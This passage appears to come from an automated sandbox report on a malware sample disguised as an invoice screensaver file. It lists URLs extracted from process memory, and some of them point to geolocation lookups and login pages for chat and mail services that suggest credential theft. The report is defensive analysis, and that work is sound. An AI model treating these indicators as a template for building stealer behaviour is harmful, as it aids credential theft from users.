                  Source: bhvA1B.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                  Source: bhvA1B.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                  Source: bhvA1B.tmp.13.drString found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
                  Source: bhvA1B.tmp.13.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                  Source: bhvA1B.tmp.13.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
                  Source: bhvA1B.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
                  Source: bhvA1B.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                  Source: bhvA1B.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                  Source: bhvA1B.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
                  Source: bhvA1B.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                  Source: bhvA1B.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
                  Source: bhvA1B.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
                  Source: bhvA1B.tmp.13.drString found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
                  Source: svchost.exe, 00000005.00000003.1685715097.000002A2EEE98000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                  Source: edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                  Source: edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                  Source: edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                  Source: svchost.exe, 00000005.00000003.1685715097.000002A2EEE98000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                  Source: svchost.exe, 00000005.00000003.1685715097.000002A2EEE98000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                  Source: svchost.exe, 00000005.00000003.1685715097.000002A2EEECD000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                  Source: edb.log.5.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                  Source: .exe, 0000000B.00000002.4126030463.0000000001552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
                  Source: .exe, 0000000B.00000002.4125168442.000000000151A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/chedvmbusRFCOMM
                  Source: .exe, 0000000B.00000002.4125168442.000000000151A000.00000004.00000020.00020000.00000000.sdmp, .exe, 0000000B.00000002.4125168442.00000000014E7000.00000004.00000020.00020000.00000000.sdmp, .exe, 0000000B.00000002.4125168442.0000000001541000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                  Source: FAT6789098700900.scr.exe, 00000000.00000002.4129439610.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, FAT6789098700900.scr.exe, 00000000.00000002.4129439610.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, FAT6789098700900.scr.exe, 00000003.00000002.1914432587.0000000000957000.00000002.00000400.00020000.00000000.sdmp, .exe, 00000008.00000002.4129081152.0000000003A7A000.00000004.00000800.00020000.00000000.sdmp, .exe, 0000000B.00000002.4123803181.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: .exe, 0000000B.00000002.4125168442.0000000001541000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp6
                  Source: .exe, 0000000B.00000002.4125168442.000000000151A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
                  Source: .exe, 0000000B.00000002.4125168442.0000000001541000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpu
                  Source: powershell.exe, 00000001.00000002.1693445037.00000000060CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1822124849.0000000005C2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: bhvA1B.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: bhvA1B.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0:
                  Source: bhvA1B.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0H
                  Source: bhvA1B.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0I
                  Source: bhvA1B.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0Q
                  Source: bhvA1B.tmp.13.drString found in binary or memory: http://ocsp.msocsp.com0
                  Source: bhvA1B.tmp.13.drString found in binary or memory: http://ocsp.msocsp.com0S
                  Source: bhvA1B.tmp.13.drString found in binary or memory: http://ocspx.digicert.com0E
                  Source: powershell.exe, 00000009.00000002.1811441059.0000000004D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: FAT6789098700900.scr.exe, .exe.1.drString found in binary or memory: http://schemas.asp.net/2015/03/dataProtection
                  Source: powershell.exe, 00000001.00000002.1672388418.0000000005061000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1811441059.0000000004BC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Amcache.hve.7.drString found in binary or memory: http://upx.sf.net
                  Source: FAT6789098700900.scr.exe, 00000000.00000002.4140609938.0000000006DB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: powershell.exe, 00000009.00000002.1811441059.0000000004D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: FAT6789098700900.scr.exe, 00000000.00000002.4140609938.0000000006DB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: bhvA1B.tmp.13.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: bhvA1B.tmp.13.drString found in binary or memory: http://www.digicert.com/CPS0~
                  Source: .exe, .exe, 00000011.00000002.1851779290.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                  Source: FAT6789098700900.scr.exe, 00000000.00000002.4140609938.0000000006DB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: FAT6789098700900.scr.exe, 00000000.00000002.4140609938.0000000006DB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: FAT6789098700900.scr.exe, 00000000.00000002.4140609938.0000000006DB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: FAT6789098700900.scr.exe, 00000000.00000002.4140609938.0000000006DB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: FAT6789098700900.scr.exe, 00000000.00000002.4140609938.0000000006DB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                  Source: FAT6789098700900.scr.exe, 00000000.00000002.4140609938.0000000006DB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: FAT6789098700900.scr.exe, 00000000.00000002.4140609938.0000000006DB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: FAT6789098700900.scr.exe, 00000000.00000002.4140609938.0000000006DB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: FAT6789098700900.scr.exe, 00000000.00000002.4140609938.0000000006DB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                  Source: FAT6789098700900.scr.exe, 00000000.00000002.4140609938.0000000006DB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: FAT6789098700900.scr.exe, 00000000.00000002.4140609938.0000000006DB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: FAT6789098700900.scr.exe, 00000000.00000002.4140609938.0000000006DB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: FAT6789098700900.scr.exe, 00000000.00000002.4140609938.0000000006DB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: FAT6789098700900.scr.exe, 00000000.00000002.4140609938.0000000006DB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: FAT6789098700900.scr.exe, 00000000.00000002.4140609938.0000000006DB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: .exe, .exe, 00000011.00000002.1851779290.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                  Source: .exe, 00000011.00000002.1851779290.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                  Source: .exe, 00000011.00000002.1851779290.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                  Source: FAT6789098700900.scr.exe, 00000000.00000002.4140609938.0000000006DB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: bhvA1B.tmp.13.drString found in binary or memory: http://www.msftconnecttest.com/connecttest.txt?n=1696334965379
                  Source: .exe, 0000000D.00000002.1860840843.0000000000D53000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                  Source: .exe, 00000011.00000002.1851779290.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                  Source: FAT6789098700900.scr.exe, 00000000.00000002.4140609938.0000000006DB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: FAT6789098700900.scr.exe, 00000000.00000002.4140609938.0000000006DB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: FAT6789098700900.scr.exe, 00000000.00000002.4140609938.0000000006DB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: FAT6789098700900.scr.exe, 00000000.00000002.4140609938.0000000006DB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                  Source: FAT6789098700900.scr.exe, 00000000.00000002.4140609938.0000000006DB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                  Source: FAT6789098700900.scr.exe, 00000000.00000002.4140609938.0000000006DB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: FAT6789098700900.scr.exe, 00000000.00000002.4140609938.0000000006DB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
                  Source: .exe.1.drString found in binary or memory: https://aka.ms/aspnet/dataprotectionwarning
                  Source: powershell.exe, 00000001.00000002.1672388418.0000000005061000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1811441059.0000000004BC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpX
                  Source: powershell.exe, 00000009.00000002.1822124849.0000000005C2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000009.00000002.1822124849.0000000005C2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000009.00000002.1822124849.0000000005C2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFD
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?99bdaa7641aea1439604d0afe8971477
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?bc7d158a1b0c0bcddb88a222b6122bda
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?4be9f57fdbd89d63c136fa90032d1d91
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?e5772e13592c9d33c9159aed24f891a7
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?a6aceac28fb5ae421a73cab7cdd76bd8
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?b57fe5cd49060a950d25a1d237496815
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?2f6c563d6db8702d4f61cfc28e14d6ba
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?3dacce210479f0b4d47ed33c21160712
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?7e0e9c3a9f02f17275e789accf11532b
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?81f59f7d566abbd2077a5b6cdfd04c7b
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?3c5bdbf226e2549812723f51b8fe2023
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?c50299ad5b45bb3d4c7a57024998a291
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
                  Source: svchost.exe, 00000005.00000003.1685715097.000002A2EEF42000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                  Source: edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                  Source: edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                  Source: edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                  Source: svchost.exe, 00000005.00000003.1685715097.000002A2EEF42000.00000004.00000800.00020000.00000000.sdmp, edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                  Source: powershell.exe, 00000009.00000002.1811441059.0000000004D12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-ae
                  Source: .exeString found in binary or memory: https://login.yahoo.com/config/login
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_sKiljltKC1Ne_Y3fl1HuHQ2.css
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_BxKM4IRLudkIao5qo
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_AI1nyU_u3YQ_at1fSBm4Uw2.js
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://maps.windows.com/windows-app-web-link
                  Source: powershell.exe, 00000001.00000002.1693445037.00000000060CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1822124849.0000000005C2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
                  Source: svchost.exe, 00000005.00000003.1685715097.000002A2EEF42000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                  Source: edb.log.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=27ff908e89d7b6264fde
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=586ba6
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=7ccb04
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=b1ed69
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816d
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-0debb885be07c402c948.js
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ec3581b6c9e6e9985aa7.chunk.v7.js
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.6c288f9aff9797959103.chunk.v7.js
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.9ba2d4c9e339ba497e10.chunk.v7.js
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-1652fd8b358d589e6ec0.js
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.52c45571d19ede0a7005.chunk.v7.j
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.d918c7fc33e22b41b936.chunk.v7.c
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://www.digicert.com/CPS0
                  Source: .exe, .exe, 00000011.00000002.1851779290.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: .exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                  Source: bhvA1B.tmp.13.drString found in binary or memory: https://www.office.com/

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
